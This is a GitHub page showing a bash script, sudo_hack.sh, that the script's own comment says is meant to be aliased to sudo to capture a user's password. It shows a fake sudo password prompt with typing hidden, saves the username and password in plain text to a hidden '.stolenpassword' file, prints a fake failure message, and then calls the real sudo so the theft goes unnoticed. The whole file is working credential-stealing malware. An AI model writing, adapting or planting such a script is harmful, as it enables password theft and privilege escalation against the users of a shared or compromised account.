-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathsudo_hack.sh
More file actions
executable file
·44 lines (35 loc) · 1.42 KB
/
sudo_hack.sh
File metadata and controls
executable file
·44 lines (35 loc) · 1.42 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#!/bin/bash
### Alias this to sudo to get a user's password
commande="$1"
arguments="$2"
sudo_output="usage: sudo -h | -K | -k | -V
usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user]
[command]
usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p
prompt] [-T timeout] [-u user] [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p
prompt] [-T timeout] [-u user] file ..."
error_output=$(sudo -l | grep badpass | cut -d , -f3 | cut -d = -f2)
error_output_hardcoded="sorry, try again"
trashfile=".trashfile"
password_file=".stolenpassword"
if [[ $# -eq 0 ]]; then echo "$sudo_output"; exit 0; fi
echo "$commande $arguments" > "$trashfile"
function get_password () {
echo -n "[sudo] password for $(whoami):"
trap "stty echo" EXIT INT HUP QUIT # Exec "" if SIGS received
stty -echo # Hide typing
read -r password
stty echo # Show typing
trap - EXIT INT HUP QUIT # Cancel previous trap
echo -e "User: $(whoami)\nPass: $password" > "$password_file"
sleep 2
echo -e "\n$error_output_hardcoded"
}
if [[ ! -e "$password_file" ]]; then get_password; fi
### Execute command
commande="$(cat "$trashfile" |cut -d " " -f1)"
arguments="$(cat "$trashfile" |cut -d " " -f2)"
rm -f "$trashfile"
/usr/bin/sudo "$commande" "$arguments"